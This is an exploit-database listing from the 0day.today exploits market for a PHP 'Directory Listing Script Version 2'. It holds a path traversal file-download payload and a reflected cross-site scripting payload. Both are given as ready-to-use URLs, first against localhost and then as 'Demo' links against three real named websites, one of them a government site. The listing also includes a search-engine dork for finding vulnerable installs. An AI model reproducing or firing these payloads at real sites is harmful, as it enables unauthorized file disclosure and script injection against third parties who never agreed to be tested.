[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Directory Listing Script Version 2 Multiple Vulnerabilities

Author
Daniel Godoy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15645
Category
web applications
Date add
19-03-2011
Platform
php
# Exploit Title: Directory Listing Script Version 2 Multiple Vulnerabilities
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software: Directory Listing Script - Version 2
# Download: http://www.evoluted.net
# Dork: Directory Listing Script ©2008 Evoluted, Web Design Sheffield.

[Comment]
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick Jordan,Animacco ,
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El Rodrix, l0ve, NetTxic,
Gusan0r, Sabertrail, Maxi Soler, Darioxhcx,r0dr1,Zer0-Zo0rg, y0u-know, SIR <3


[File Download]
http://localhost/index.php?dir=../..&download=../../index.php

[Demo]
http://www.legistdf.gov.ar/lp/presidencia/index.php?dir=../..&download=../../index.php
http://www.bibliotecagnostica.net/download/iglesia/index.php?dir=../..&download=../../index.php
http://www.chienhwa.net/PET/index.php?dir=../..&download=../../index.php

[XSS]
http://localhost/index.php?dir=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
[Demo]
http://www.legistdf.gov.ar/lp/presidencia/index.php?dir=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E
 http://www.bibliotecagnostica.net/download/iglesia/index.php?dir=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3
http://www.chienhwa.net/PET/index.php?dir=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3



#  0day.today [2024-07-05]  #